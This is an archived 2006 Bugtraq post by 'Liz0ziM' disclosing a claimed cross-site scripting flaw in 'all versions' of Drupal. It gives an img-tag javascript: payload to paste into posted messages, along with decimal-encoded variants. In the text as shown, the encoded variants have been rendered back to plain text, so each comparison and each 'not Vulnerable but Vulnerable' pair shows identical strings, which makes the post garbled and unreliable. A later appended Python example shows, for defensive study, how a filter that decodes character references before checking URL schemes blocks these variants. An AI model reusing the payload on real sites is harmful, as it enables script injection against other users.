[41905] in bugtraq
Drupal all version xss cehennem.org
daemon@ATHENA.MIT.EDU (liz0@bsdmail.com)
Tue Jan 3 15:03:45 2006
Date: 2 Jan 2006 10:45:25 -0000
Message-ID: <20060102104525.7170.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: liz0@bsdmail.com
To: bugtraq@securityfocus.com
Drupal all version xss
----------------------------------------------------
site:http://www.drupal.org
Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
--------------------------------------------------
img tag : on
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
Decimal Value: HTML (without semicolons)
<img src=javascript:alert('XSS')> = <img src=javascript:alert('XSS')>
---------------------------------------------------------------------------------------------------------------------------------------------------------------
Decimal Value: HTML (with semicolons)
<img src=javascript:alert('XSS')> = <img src=javascript:alert('XSS')>
---------------------------------------------------------------------------------------------------------------------------------------------------------------
example:
post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')> Vulnerable
post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')> Vulnerable
---------------------------------------------------------
Credit:Liz0ziM
mail:liz0@bsdmail.com
www.biyo.tk , www.cehennem.org
Greetz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friends
-----------------------------------------------------------
Source:
http://liz0zim.no-ip.org/drupal.txt
------------------------------------------------------------
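
Added example, not part of the original post and not Drupal's code: a filter that tests the literal src string passes the decimal-encoded spellings described above, while a check that decodes character references first (with or without semicolons) and then allow-lists the URL scheme rejects all three. The function names, the allow-list and the sample strings are assumptions constructed for illustration.

```python
import html
import re

ALLOWED_SCHEMES = {"http", "https"}  # assumption: allow-list chosen for this example
_IGNORED = re.compile(r"[\x00-\x20\x7f]")  # whitespace/control chars, dropped before the scheme test
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def naive_is_safe(raw_src):
    """Hypothetical stand-in for a filter that only matches the literal string."""
    return "javascript:" not in raw_src.lower()


def decoded_scheme(raw_src):
    """Scheme of the URL as an HTML parser sees it, or None for a relative URL."""
    # html.unescape follows the HTML5 rules: decimal and hex character
    # references are decoded with or without the trailing semicolon.
    decoded = _IGNORED.sub("", html.unescape(raw_src))
    match = _SCHEME.match(decoded)
    return match.group(1).lower() if match else None


def hardened_is_safe(raw_src):
    """Allow relative URLs and allow-listed schemes only, judged after decoding."""
    scheme = decoded_scheme(raw_src)
    return scheme is None or scheme in ALLOWED_SCHEMES


def to_decimal_refs(text, semicolons):
    """Spell text as decimal character references (used to build the samples)."""
    end = ";" if semicolons else ""
    return "".join(f"&#{ord(ch)}{end}" for ch in text)


# Constructed samples: the src value from the post in its three spellings.
SAMPLES = {
    "literal": "javascript:alert('XSS')",
    "decimal, with semicolons": to_decimal_refs("javascript", True) + ":alert('XSS')",
    "decimal, without semicolons": to_decimal_refs("javascript", False) + ":alert('XSS')",
    "ordinary image": "https://example.org/logo.png",
}


def compare():
    """Map each sample label to (naive verdict, hardened verdict)."""
    return {k: (naive_is_safe(v), hardened_is_safe(v)) for k, v in SAMPLES.items()}


if __name__ == "__main__":
    for label, verdicts in compare().items():
        print(f"{label:30} naive_safe={verdicts[0]!s:5} hardened_safe={verdicts[1]}")
```

The scheme test is deliberately conservative: any absolute URL whose scheme is not on the allow-list is rejected, and relative URLs are accepted.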